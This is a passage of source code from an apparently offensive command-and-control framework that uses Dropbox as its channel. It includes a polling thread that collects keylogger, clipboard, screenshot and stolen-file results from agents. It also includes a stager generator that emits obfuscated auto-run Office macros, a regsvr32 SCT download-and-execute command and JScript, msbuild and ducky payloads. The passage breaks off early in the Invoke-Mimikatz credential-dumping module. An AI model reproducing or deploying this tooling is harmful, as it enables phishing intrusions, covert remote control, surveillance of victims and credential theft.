server".format(moduleName)) #------------------------------------------------------------------------------------ def genStager(self, stagerType, stageName): # These are the common parameters required by the various stager (powershell or other) script stagerParameters = { 'stagePublicURL': self.statusHandler.publishedStageList[stageName], 'xorKey': Crypto.convertKey(self.statusHandler.masterKey, outputFormat = "sha256"), 'masterKey': helpers.b64encode(self.statusHandler.masterKey), 'accessToken': self.dropboxHandler.token } if stagerType == "oneliner": print print helpers.color(stagers.GenStager.oneLiner(stagerParameters), 'green') print print helpers.color("[*] HINT: You can use this powershell oneliner as is, or with one of the fantastic 'Nishang' client side attack vector generator") return elif stagerType == "batch": stagers.GenStager.batch(stagerParameters) return elif stagerType == "batch2": stagers.GenStager.batch2(stagerParameters) return elif stagerType == "macro": stagers.GenStager.macro(stagerParameters) return elif stagerType == "msbuild": stagers.GenStager.msbuild(stagerParameters) return elif stagerType == "javascript": stagers.GenStager.javascript(stagerParameters) return elif stagerType == "javascript2": stagers.GenStager.javascript2(stagerParameters) return elif stagerType == "ducky": stagers.GenStager.ducky(stagerParameters) return elif stagerType == "sct": stagers.GenStager.sct(stagerParameters) return #------------------------------------------------------------------------------------ def genStager2(self, stagerType, arguments): # Generate a powershell one liner stager that downloads and execute the agent stage (exe) in memory if stagerType == "macro_sct": stagers.GenStager.macro_sct(arguments) return ================================================ FILE: lib/pollingThread.py ================================================ # -*- coding: utf8 -*- import config as cfg from lib import helpers from lib.crypto import Crypto import threading import os.path from datetime import * #**************************************************************************************** # Class for the polling thread and task result treatment #**************************************************************************************** class PollingThread: """ This class contains the polling thread function as well as the task result treatment function """ #------------------------------------------------------------------------------------ def __init__(self, dropboxHandler, statusHandler): self.dropboxHandler = dropboxHandler self.statusHandler = statusHandler self.pollingThreadEnabled = True self.pollingPeriod = cfg.defaultPollingPeriod #------------------------------------------------------------------------------------ def stopPollingThread(self): self.pollingThreadEnabled = False #------------------------------------------------------------------------------------ def treatTaskResult(self, task, taskResultFilePath): # We have a match for a pending task that has completed agentID = task['agentID'] taskID = task['id'] args = task['args'] cmd = task['cmd'] proceed = True # Read the task result file result = Crypto.decryptData(self.dropboxHandler.readFile(taskResultFilePath, resultFormat="bytes"), self.statusHandler.masterKey) # Error handling if result is None: proceed = False elif cmd not in ['runCLI', 'runPSModule']: if result.startswith("ERROR"): print helpers.color("\n[!] Task ID [{}] on agent ID [{}] failed with error: [{}]".format(taskID, agentID, result)) proceed = False # Proceed with task result treatment if proceed: if cmd in ['runCLI', 'runPSModule']: print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed".format(taskID, agentID)) print "[{}]".format(task['cmd']) print "" print result elif cmd in ['launchProcess', 'polling', 'sendkeystrokes', 'persist']: print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]".format(taskID, agentID, result)) elif cmd == "getFile": agentFile = args[0] # Compute a local file name based on the agent file name localFile = os.path.join(cfg.defaultPath['incoming'], os.path.basename(agentFile.replace("\\","/"))) print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]".format(taskID, agentID, result)) print helpers.color("[*] Please wait while downloading file [{}] and saving it to [{}]".format(result,localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write(Crypto.decryptData(self.dropboxHandler.readFile(result, resultFormat="bytes"), self.statusHandler.masterKey)) fileHandle.close() print helpers.color("[*] File saved [{}]".format(localFile)) # Delete the remote file self.dropboxHandler.deleteFile(result) elif cmd == "sendFile": print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]".format(taskID, agentID, result)) print helpers.color("[*] [{}]".format(result)) elif cmd == "sleep": self.statusHandler.setAgentAttribute(agentID, "wakeUpTime", result.split(",")[1]) self.statusHandler.setAgentAttribute(agentID, "status", "SLEEPING") print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]".format(taskID, agentID, result)) print helpers.color("[*] Agent is going to sleep") elif cmd == "keylogger": if args[0] == "stop": localFile = os.path.join(cfg.defaultPath['incoming'], "keylogger.txt") print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully".format(taskID, agentID)) print helpers.color("[*] Saving keylogger results to file [{}]".format(localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write(result) fileHandle.close() print helpers.color("[*] File saved [{}]".format(localFile)) else: print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]".format(taskID, agentID, result)) elif cmd == "clipboardlogger": if args[0] == "stop": print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully".format(taskID, agentID)) localFile = os.path.join(cfg.defaultPath['incoming'], "clipboardlogger.txt") print helpers.color("[*] Saving clipboard logger results to file [{}]".format(localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write(result) fileHandle.close() print helpers.color("[*] File saved [{}]".format(localFile)) else: print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]".format(taskID, agentID, result)) elif cmd == "screenshot": # Compute a local file name based on the agent file name localFile = os.path.join(cfg.defaultPath['incoming'], "screenshot.jpg") print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]".format(taskID, agentID, result)) print helpers.color("[*] Please wait while downloading file [{}] and saving it to [{}]".format(result,localFile)) with open(localFile, 'w+') as fileHandle: fileHandle.write(Crypto.decryptData(self.dropboxHandler.readFile(result, resultFormat="bytes"), self.statusHandler.masterKey)) fileHandle.close() print helpers.color("[*] File saved [{}]".format(localFile)) # Delete the remote file self.dropboxHandler.deleteFile(result) elif cmd == "stop": self.statusHandler.setAgentAttribute(agentID, "status", "DEAD") self.dropboxHandler.deleteFile(self.statusHandler.getAgentAttribute(agentID, "statusFile")) self.dropboxHandler.deleteFile(self.statusHandler.getAgentAttribute(agentID, "commandFile")) print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]".format(taskID, agentID, result)) # Remove the task from the task list self.statusHandler.removeTask(task) # Delete the task result file on the server self.dropboxHandler.deleteFile(taskResultFilePath) #------------------------------------------------------------------------------------ def treatPushedData(self, pushedDataFilePath): # Read the pushed data result file result = Crypto.decryptData(self.dropboxHandler.readFile(pushedDataFilePath, resultFormat="bytes"), self.statusHandler.masterKey) # Error handling if result is None: print helpers.color("\n[!] Error retrieving data pushed by the agent ID [{}]".format(agentID)) else: print result # Delete the push result file on the server self.dropboxHandler.deleteFile(pushedDataFilePath) #------------------------------------------------------------------------------------ def doPoll(self): """ This function runs periodically (every 'pollingPeriod' seconds) It checks various files on the C2 server: - list available agents and their status - result of agent's tasks - published agent stages """ # First check if polling has been disabled if not self.pollingThreadEnabled: return # List the application's root folder folderList = self.dropboxHandler.listFolder("") if folderList is not None: nowUTC = datetime.utcnow() delta = timedelta(minutes = 1) # Time delta of 1 minute to decide on agent's health # If present, each entry is either a file or directory for entry in folderList['entries']: #----------------------------------------------------------------------------------------------- # Looking for ".status" extension's files representing each agent's status file if entry['name'].endswith(".status"): # Get the agent ID agentID = entry['name'][0:-7] # removing the extension to get the actual agent ID # If this agent is *KNOWN* to be sleeping and its wake up time has not yet been reached # just do nothing with it and skip this entry if self.statusHandler.agentIsKnown(agentID) and self.statusHandler.agentIsSleeping(agentID): agentWakeUpTimeUTC = self.statusHandler.getAgentWakeUpTimeUTC(agentID) if nowUTC < agentWakeUpTimeUTC: continue # Get the file's last modified time (ie: last beacon) agentLastBeacon = entry['server_modified'] agentLastBeaconUTC = datetime.strptime(agentLastBeacon,"%Y-%m-%dT%H:%M:%SZ") # If it's an agent we've already discovered, set its lastBeacon attribute if self.statusHandler.agentIsKnown(agentID): self.statusHandler.setAgentAttribute(agentID, "lastBeacon", agentLastBeacon) # Else, it's a new agent we've discovered, let's record it else: self.statusHandler.createAgent(agentID, agentLastBeacon, entry['path_lower']) print helpers.color("[+] Agent found with ID {}".format(agentID)) # If it's a new agent, we must check its actual status if self.statusHandler.agentIsNew(agentID): # Maybe the agent is SLEEPING, let's check this content = self.dropboxHandler.readFile(self.statusHandler.getAgentAttribute(agentID, "statusFile")) if content is not None and content.startswith("SLEEPING"): agentWakeUpTime = content.split(",")[1] # Retrieve expected wake up time agentWakeUpTimeUTC = datetime.strptime(agentWakeUpTime,"%Y-%m-%dT%H:%M:%SZ") # Have we passed the wake up time ? if nowUTC > agentWakeUpTimeUTC: self.statusHandler.setAgentAttribute(agentID, "status", "DEAD") else: self.statusHandler.setAgentAttribute(agentID, "status", "SLEEPING") self.statusHandler.setAgentAttribute(agentID, "wakeUpTime", agentWakeUpTime) print helpers.color("[*] Agent with ID {} is sleeping".format(agentID)) # Check if the agent's lastBeacon is older than a minute if (nowUTC - agentLastBeaconUTC) > delta: self.statusHandler.setAgentAttribute(agentID, "status", "DEAD") else: if self.statusHandler.agentIsNew(agentID): self.statusHandler.setAgentAttribute(agentID, "status", "ALIVE") if self.statusHandler.agentIsDead(agentID): self.statusHandler.setAgentAttribute(agentID, "status", "ALIVE") print helpers.color("[*] Agent with ID [{}] has become alive".format(agentID)) elif self.statusHandler.agentIsSleeping(agentID): agentWakeUpTimeUTC = self.statusHandler.getAgentWakeUpTimeUTC(agentID) if nowUTC >= agentWakeUpTimeUTC: self.statusHandler.setAgentAttribute(agentID, "status", "ALIVE") self.statusHandler.setAgentAttribute(agentID, "wakeUpTime", "N/A") print helpers.color("[*] Agent with ID [{}] has woken up".format(agentID)) #----------------------------------------------------------------------------------------------- # Looking for ".aa" extension's files representing a published stage elif entry['name'].endswith(".aa"): stageName = entry['name'].split('.')[0] if stageName not in self.statusHandler.publishedStageList: # Get the shared link for this file content = self.dropboxHandler.getSharedLink(entry['path_lower']) if content is not None and len(content['links']) > 0: stageLink = content['links'][0]['url'].replace("dl=0","dl=1") self.statusHandler.addStage(stageName, stageLink) print helpers.color("[+] Found a published stage: [{}]".format(stageName)) else: self.statusHandler.addStage(stageName, "NONE") print helpers.color("[!] Published stage [{}] doesn't seem to be shared with a public link".format(entry['name'])) #----------------------------------------------------------------------------------------------- # Looking for ".mm" extension's files representing a published module elif entry['name'].endswith(".mm"): moduleName = entry['name'].split('.')[0] if moduleName not in self.statusHandler.publishedModuleList: # Get the shared link for this file content = self.dropboxHandler.getSharedLink(entry['path_lower']) if content is not None and len(content['links']) > 0: moduleLink = content['links'][0]['url'].replace("dl=0","dl=1") self.statusHandler.addModule(moduleName, moduleLink) print helpers.color("[+] Found a published module: [{}]".format(moduleName)) else: self.statusHandler.addModule(moduleName, "NONE") print helpers.color("[!] Published module [{}] doesn't seem to be shared with a public link".format(entry['name'])) #----------------------------------------------------------------------------------------------- # Looking for ".push" extension's files representing a push of data initiated by the agent elif entry['name'].endswith(".dd"): self.treatPushedData(entry['path_lower']) #----------------------------------------------------------------------------------------------- # Check for tasks resulting files else: # Check all pending tasks, for any agent we might have been working on for task in self.statusHandler.pendingTaskList: if entry['name'] == task['fileName']: # Treat the task results self.treatTaskResult(task, entry['path_lower']) # Eventually, re-enable the polling thread if self.pollingThreadEnabled: threading.Timer(self.statusHandler.pollingPeriod, self.doPoll).start() ================================================ FILE: lib/stagers.py ================================================ # -*- coding: utf8 -*- import config as cfg from lib import helpers #**************************************************************************************** # Class generating all type of stagers, based on some powershell code in all cases #**************************************************************************************** class GenStager: #----------------------------------------------------------- @classmethod def oneLiner(cls, stagerParameters): """Creates a powershell one liner command line using base64 encoded powershell script""" # Construct the powershell code from a template, substituting palceholders with proper parameters posh = helpers.convertFromTemplate(stagerParameters, cfg.defaultPath['poshTpl']) if posh == None: return # Turn the powershell code into a suitable powershell base64 encoded one line command base64Payload = helpers.powershellEncode(posh) oneLiner = helpers.convertFromTemplate({'payload': base64Payload}, cfg.defaultPath['onelinerTpl']) return oneLiner #----------------------------------------------------------- @classmethod def batch(cls, stagerParameters): """Creates a Windows batch file (.bat) that launches a powershell one liner command""" # First generate the powershell one liner oneLiner = cls.oneLiner(stagerParameters) batch = helpers.convertFromTemplate({'oneliner': oneLiner}, cfg.defaultPath['batchTpl']) if batch == None: return try: with open(cfg.defaultPath['batchStager'],"w+") as f: f.write(batch) f.close() print helpers.color("[+] Batch stager saved in [{}]".format(cfg.defaultPath['batchStager'])) except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['batchStager'])) #----------------------------------------------------------- @classmethod def batch2(cls, stagerParameters): """Creates a Windows batch file (.bat) that launches a powershell one liner command""" # First generate the powershell one liner oneLiner2 = helpers.convertFromTemplate(stagerParameters, cfg.defaultPath['oneLiner2Tpl']) batch = helpers.convertFromTemplate({'oneliner': oneLiner2}, cfg.defaultPath['batchTpl']) if batch == None: return try: with open(cfg.defaultPath['batchStager'],"w+") as f: f.write(batch) f.close() print helpers.color("[+] Batch stager saved in [{}]".format(cfg.defaultPath['batchStager'])) except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['batchStager'])) #----------------------------------------------------------- @classmethod def macro(cls, stagerParameters): """Creates an Office VBA macro that launches a powershell one liner command""" # First generate the powershell one liner oneLiner = cls.oneLiner(stagerParameters) # Scramble the oneliner with a dumb caesar cipher :-) Simple obfuscation will do key = helpers.randomInt(0,94) # 94 is the range of printable ASCII chars (between 32 and 126) scrambledOneliner = "" for char in oneLiner: num = ord(char) - 32 # Translate the working space, 32 being the first printable ASCI char shifted = (num + key)%94 + 32 if shifted == 34: scrambledOneliner += "\"{}".format(chr(shifted)) # Handling the double quote print problem in VBA else: scrambledOneliner += chr(shifted) # Split this scrambled oneliner is 50 chars long chunk of strings chunks = list(helpers.chunks(scrambledOneliner, 50)) # This is the actual VBA code to launch powershell using WMI services # Variable's names are randomized varKey = helpers.randomString(5) varStr = helpers.randomString(5) varObjWMI = helpers.randomString(5) varObjStartup = helpers.randomString(5) varObjConfig = helpers.randomString(5) varObjProcess = helpers.randomString(5) payload = "\tDim {} As String\n".format(varStr) payload += "\t{} = \"".format(varStr) + str(chunks[0]) + "\"\n" for chunk in chunks[1:]: payload += "\t{} = {} + \"".format(varStr, varStr) + str(chunk) + "\"\n" # Auto opening functions for both Word and Excel macro = "Sub Auto_Open()\n" macro += "\tComputeTable\n" macro += "End Sub\n\n" macro = "Sub AutoOpen()\n" macro += "\tComputeTable\n" macro += "End Sub\n\n" macro += "Sub Document_Open()\n" macro += "\tComputeTable\n" macro += "End Sub\n\n" macro += "Sub Workbook_Open()\n" macro += "\tComputeTable\n" macro += "End Sub\n\n" macro += "Public Function ComputeTable() As Variant\n" macro += "\tDim {} As Integer\n".format(varKey) macro += "\t{} = {}\n".format(varKey, key) macro += payload # Payload decryption stub = inverse caesar macro += "\tDim i, n, s As Integer\n" macro += "\tFor i = 1 To Len({})\n".format(varStr) macro += "\t\tn = Asc(Mid({}, i, 1))\n".format(varStr) macro += "\t\ts = n - {}\n".format(varKey) macro += "\t\tIf s < 32 Then\n" macro += "\t\t\ts = s + 94\n" macro += "\t\tEnd If\n" macro += "\t\tMid({}, i, 1) = Chr(s)\n".format(varStr) macro += "\tNext\n" # WMI Process instantiation stub #macro += "\tSet {} = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n".format(varObjWMI) # Somehow hidden like this: macro += "\tSet {} = GetObject(ChrW(119) & ChrW(105) & ChrW(110) & ChrW(109) & ChrW(103) & ChrW(109) & ChrW(116) & ChrW(115) _\n".format(varObjWMI) macro += "\t\t& ChrW(58) & ChrW(92) & ChrW(92) & ChrW(46) & ChrW(92) & ChrW(114) & ChrW(111) & ChrW(111) & ChrW(116) & ChrW(92) _\n" macro += "\t\t& ChrW(99) & ChrW(105) & ChrW(109) & ChrW(118) & ChrW(50))\n" #macro += "\tSet {} = {}.Get(\"Win32_ProcessStartup\")\n".format(varObjStartup, varObjWMI) # Somehow hidden like this: macro += "\tSet {} = {}.Get(ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) & ChrW(50) & ChrW(95) & ChrW(80) & ChrW(114) & ChrW(111) _\n".format(varObjStartup, varObjWMI) macro += "\t\t& ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(83) & ChrW(116) & ChrW(97) & ChrW(114) & ChrW(116) _\n" macro += "\t\t& ChrW(117) & ChrW(112))\n" macro += "\tSet {} = {}.SpawnInstance_\n".format(varObjConfig, varObjStartup) macro += "\t{}.ShowWindow = 0\n".format(varObjConfig) #macro += "\tSet {} = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n".format(varObjProcess) # Somehow hidden like this: macro += "\tSet {} = GetObject(ChrW(119) & ChrW(105) & ChrW(110) & ChrW(109) & ChrW(103) & ChrW(109) & ChrW(116) & ChrW(115) _\n".format(varObjProcess) macro += "\t\t& ChrW(58) & ChrW(92) & ChrW(92) & ChrW(46) & ChrW(92) & ChrW(114) & ChrW(111) & ChrW(111) & ChrW(116) & ChrW(92) _\n" macro += "\t\t& ChrW(99) & ChrW(105) & ChrW(109) & ChrW(118) & ChrW(50) & ChrW(58) & ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) _\n" macro += "\t\t& ChrW(50) & ChrW(95) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115))\n" macro += "\t{}.Create {}, Null, {}, intProcessID\n".format(varObjProcess, varStr, varObjConfig) macro += "End Function\n" try: with open(cfg.defaultPath['macroStager'], "w+") as f: f.write(macro) f.close() print helpers.color("[+] Macro stager saved in [{}]".format(cfg.defaultPath['macroStager'])) print helpers.color("[*] Hint: Use this VBA macro in Excel, sign it even with a self-signed certificate, and save it in format 'Excel 97-2003'") except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['macroStager'])) #----------------------------------------------------------- @classmethod def ducky(cls, stagerParameters): """Creates an ducky command file that launches a powershell one liner command""" # First generate the powershell one liner oneLiner = cls.oneLiner(stagerParameters) # Construct the ducky file from a template, substituting palceholders with proper parameters ducky = helpers.convertFromTemplate({'oneliner': oneLiner}, cfg.defaultPath['duckyTpl']) if ducky == None: return try: with open(cfg.defaultPath['duckyStager'],"w+") as f: f.write(ducky) f.close() print helpers.color("[+] Ducky stager saved in [{}]".format(cfg.defaultPath['duckyStager'])) except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['duckyStager'])) #----------------------------------------------------------- @classmethod def javascript(cls, stagerParameters): """Creates a javascript file that launches a powershell one liner command""" # First generate the powershell one liner oneLiner = cls.oneLiner(stagerParameters) # Construct the javascript file from a template, substituting palceholders with proper parameters javascript = helpers.convertFromTemplate({'oneliner': oneLiner}, cfg.defaultPath['javascriptTpl']) if javascript == None: return try: with open(cfg.defaultPath['javascriptStager'],"w+") as f: f.write(javascript) f.close() print helpers.color("[+] Javascript stager saved in [{}]".format(cfg.defaultPath['javascriptStager'])) except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['javascriptStager'])) #----------------------------------------------------------- @classmethod def javascript2(cls, stagerParameters): """Creates a javascript file that uses DotNetToJScript to launch a dbc2Loader serialized assembly""" # Construct the javascript file from a template, substituting palceholders with proper parameters javascript = helpers.convertFromTemplate(stagerParameters, cfg.defaultPath['javascript2Tpl']) if javascript == None: return try: with open(cfg.defaultPath['javascriptStager2'],"w+") as f: f.write(javascript) f.close() print helpers.color("[+] Javascript2 stager saved in [{}]".format(cfg.defaultPath['javascriptStager2'])) except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['javascriptStager2'])) #----------------------------------------------------------- @classmethod def msbuild(cls, stagerParameters): """Creates an msbuild.exe compilation file that launches a powershell one liner command""" # Construct the msbuild file from a template, substituting palceholders with proper parameters msbuild = helpers.convertFromTemplate(stagerParameters, cfg.defaultPath['msbuildTpl']) if msbuild == None: return try: with open(cfg.defaultPath['msbuildStager'],"w+") as f: f.write(msbuild) f.close() print helpers.color("[+] Msbuild stager saved in [{}]".format(cfg.defaultPath['msbuildStager'])) except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['msbuildStager'])) #----------------------------------------------------------- @classmethod def sct(cls, stagerParameters): """Creates a sct file, to be used with a regsrv32.exe call, that launches a powershell one liner command""" # First generate the powershell one liner oneLiner = cls.oneLiner(stagerParameters) # Construct the SCT file from a template, substituting palceholders with proper parameters sct = helpers.convertFromTemplate({'oneliner': oneLiner}, cfg.defaultPath['sctTpl']) if sct == None: return try: with open(cfg.defaultPath['sctStager'],"w+") as f: f.write(sct) f.close() print helpers.color("[+] SCT stager saved in [{}]".format(cfg.defaultPath['sctStager'])) print helpers.color("[*] Hint: Serve this file on a web server, then use the 'genStager2' command to create a VBA macro stager based on this SCT file") except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['sctStager'])) #----------------------------------------------------------- @classmethod def macro_sct(cls, sctUrl): """Creates an Office VBA macro that uses the regsvr32.exe JScript code execution trick from @subTee to load an SCT file stager""" # The shell command to be executed. It spawns a regsvr32.exe process to download the SCT stager from a URL and executed it shellCommand = "regsvr32.exe /s /n /u /i:" + sctUrl + " scrobj.dll" # Scramble the shell command with a dumb caesar cipher :-) Simple obfuscation will do key = helpers.randomInt(0,94) # 94 is the range of printable ASCII chars (between 32 and 126) scrambledShellCommand= "" for char in shellCommand: num = ord(char) - 32 # Translate the working space, 32 being the first printable ASCI char shifted = (num + key)%94 + 32 if shifted == 34: scrambledShellCommand += "\"{}".format(chr(shifted)) # Handling the double quote print problem in VBA else: scrambledShellCommand += chr(shifted) # Variable's names are randomized varStr = helpers.randomString(5) varKey = helpers.randomString(5) # Auto opening functions for both Word and Excel macro = "Sub Auto_Open()\n" macro += "\tComputeTable\n" macro += "End Sub\n\n" macro = "Sub AutoOpen()\n" macro += "\tComputeTable\n" macro += "End Sub\n\n" macro += "Sub Document_Open()\n" macro += "\tComputeTable\n" macro += "End Sub\n\n" macro += "Sub Workbook_Open()\n" macro += "\tComputeTable\n" macro += "End Sub\n\n" macro += "Public Function ComputeTable() As Variant\n" macro += "\tDim {} As String\n".format(varStr) macro += "\t{} = \"{}\"\n".format(varStr, scrambledShellCommand) macro += "\tDim {} As Integer\n".format(varKey) macro += "\t{} = {}\n".format(varKey, key) # scrambled shell Command decryption stub = inverse caesar macro += "\tDim i, n, s As Integer\n" macro += "\tFor i = 1 To Len({})\n".format(varStr) macro += "\t\tn = Asc(Mid({}, i, 1))\n".format(varStr) macro += "\t\ts = n - {}\n".format(varKey) macro += "\t\tIf s < 32 Then\n" macro += "\t\t\ts = s + 94\n" macro += "\t\tEnd If\n" macro += "\t\tMid({}, i, 1) = Chr(s)\n".format(varStr) macro += "\tNext\n" macro += "\tresult = Shell({}, 0)\n".format(varStr) macro += "End Function\n" try: with open(cfg.defaultPath['macroStager'], "w+") as f: f.write(macro) f.close() print helpers.color("[+] Macro stager saved in [{}]".format(cfg.defaultPath['macroStager'])) print helpers.color("[*] Hint: Use this VBA macro in Excel, sign it even with a self-signed certificate, and save it in format 'Excel 97-2003'") except IOError: print helpers.color("[!] Could not write stager file [{}]".format(cfg.defaultPath['macroStager'])) ================================================ FILE: lib/statusHandler.py ================================================ # -*- coding: utf8 -*- import config as cfg from datetime import * #**************************************************************************************** # Class storing various informational status #**************************************************************************************** class StatusHandler: """ This class stores various information about agents, tasks, assemblies etc, as well as functions to handle them """ #------------------------------------------------------------------------------------ def __init__(self, masterKey): self.agentList = {} self.pendingTaskList = [] self.publishedStageList = {} self.publishedModuleList = {} self.masterKey = masterKey self.pollingPeriod = cfg.defaultPollingPeriod #------------------------------------------------------------------------------------ def createTask(self, agentID, cmd, args = []): taskID = self.agentList[agentID]['lastTaskID'] + 1 task = { 'agentID': agentID, 'id': taskID, 'fileName': agentID + "." + str(taskID), 'cmd': cmd, 'args': args } return task #------------------------------------------------------------------------------------ def commitTask(self, task): self.pendingTaskList.append(task) self.agentList[task['agentID']]['lastTaskID'] = task['id'] self.agentList[task['agentID']]['pendingTaskID'] = task['id'] #------------------------------------------------------------------------------------ def removeTask(self, task): self.agentList[task['agentID']]['pendingTaskID'] = 0 self.pendingTaskList.remove(task) #------------------------------------------------------------------------------------ def createAgent(self, agentID, agentLastBeacon, agentStatusFile): self.agentList[agentID] = {} self.agentList[agentID]['status'] = "UNKNOWN" self.agentList[agentID]['lastBeacon'] = agentLastBeacon self.agentList[agentID]['statusFile'] = agentStatusFile self.agentList[agentID]['commandFile'] = agentStatusFile[0:-7] + ".cmd" self.agentList[agentID]['wakeUpTime'] = "N/A" self.agentList[agentID]['lastTaskID'] = 0 self.agentList[agentID]['pendingTaskID'] = 0 #------------------------------------------------------------------------------------ def agentIsKnown(self, agentID): return (agentID in self.agentList) #------------------------------------------------------------------------------------ def agentIsAlive(self, agentID): return (self.agentList[agentID]['status'] == "ALIVE") #------------------------------------------------------------------------------------ def agentIsSleeping(self, agentID): return (self.agentList[agentID]['status'] == "SLEEPING") #------------------------------------------------------------------------------------ def agentIsNew(self, agentID): return (self.agentList[agentID]['status'] == "UNKNOWN") #------------------------------------------------------------------------------------ def agentIsDead(self, agentID): return (self.agentList[agentID]['status'] == "DEAD") #------------------------------------------------------------------------------------ def getAgentAttribute(self, agentID, attribute): return self.agentList[agentID][attribute] #------------------------------------------------------------------------------------ def getAgentWakeUpTimeUTC(self, agentID): return datetime.strptime(self.agentList[agentID]['wakeUpTime'], "%Y-%m-%dT%H:%M:%SZ") #------------------------------------------------------------------------------------ def setAgentAttribute(self, agentID, attribute, value): self.agentList[agentID][attribute] = value return #------------------------------------------------------------------------------------ def agentCanBeTasked(self, agentID): return (self.agentList[agentID]['pendingTaskID'] == 0) and self.agentList[agentID]['status'] != "DEAD" #------------------------------------------------------------------------------------ def addStage(self, stageName, stageLink): self.publishedStageList[stageName] = stageLink #------------------------------------------------------------------------------------ def removeStage(self, stageName): del self.publishedStageList[stageName] #------------------------------------------------------------------------------------ def isValidStage(self, stageName): return (stageName in self.publishedStageList and self.publishedStageList[stageName] != "NONE") #------------------------------------------------------------------------------------ def addModule(self, moduleName, moduleLink): self.publishedModuleList[moduleName] = moduleLink #------------------------------------------------------------------------------------ def removeModule(self, moduleName): del self.publishedModuleList[moduleName] #------------------------------------------------------------------------------------ def isValidModule(self, moduleName): return (moduleName in self.publishedModuleList and self.publishedModuleList[moduleName] != "NONE") ================================================ FILE: modules/Fun.ps1 ================================================ function Say ([string] $sentence) { (New-Object -com SAPI.SpVoice).Speak($sentence) | Out-Null } ================================================ FILE: modules/Invoke-Mimikatz.ps1 ================================================ function Invoke-Mimikatz { <# .SYNOPSIS This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk. The script has a ComputerName parameter which allows it to be executed against multiple computers. This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. Function: Invoke-Mimikatz Author: Joe Bialek, Twitter: @JosephBialek Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: benjamin@gentilkiwi.com. Twitter @gentilkiwi License: http://creativecommons.org/licenses/by/3.0/fr/ Required Dependencies: Mimikatz (included) Optional Dependencies: None Version: 1.5 ReflectivePEInjection version: 1.1 Mimikatz version: 2.1.0 alpha (3/31/2016) .DESCRIPTION Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. .PARAMETER DumpCreds Switch: Use mimikatz to dump credentials out of LSASS. .PARAMETER DumpCerts Switch: Use mimikatz to export all private certificates (even if they are marked non-exportable). .PARAMETER Command Supply mimikatz a custom command line. This works exactly the same as running the mimikatz executable like this: mimikatz "privilege::debug exit" as an example. .PARAMETER ComputerName Optional, an array of computernames to run the script on. .EXAMPLE Execute mimikatz on the local computer to dump certificates. Invoke-Mimikatz -DumpCerts .EXAMPLE Execute mimikatz on two remote computers to dump credentials. Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2") .EXAMPLE Execute mimikatz on a remote computer with the custom command "privilege::debug exit" which simply requests debug privilege and exits Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1" .NOTES This script was created by combining the Invoke-ReflectivePEInjection script written by Joe Bialek and the Mimikatz code written by Benjamin DELPY Find Invoke-ReflectivePEInjection at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection Find mimikatz at: http://blog.gentilkiwi.com .LINK Blog: http://clymb3r.wordpress.com/ Benjamin DELPY blog: http://blog.gentilkiwi.com Github repo: https://github.com/clymb3r/PowerShell mimikatz Github repo: https://github.com/gentilkiwi/mimikatz Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ #> [CmdletBinding(DefaultParameterSetName="DumpCreds")] Param( [Parameter(Position = 0)] [String[]] $ComputerName, [Parameter(ParameterSetName = "DumpCreds", Position = 1)] [Switch] $DumpCreds, [Parameter(ParameterSetName = "DumpCerts", Position = 1)] [Switch] $DumpCerts, [Parameter(ParameterSetName = "CustomCommand", Position = 1)] [String] $Command ) Set-StrictMode -Version 2 $RemoteScriptBlock = { [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $true)] [String] $PEBytes64, [Parameter(Position = 1, Mandatory = $true)] [String] $PEBytes32, [Parameter(Position = 2, Mandatory = $false)] [String] $FuncReturnType, [Parameter(Position = 3, Mandatory = $false)] [Int32] $ProcId, [Parameter(Position = 4, Mandatory = $false)] [String] $ProcName, [Parameter(Position = 5, Mandatory = $false)] [String] $ExeArgs ) ################################### ########## Win32 Stuff ########## ################################### Function Get-Win32Types { $Win32Types = New-Object System.Object #Define all the structures/enums that will be used # This article shows you how to do this with reflection: 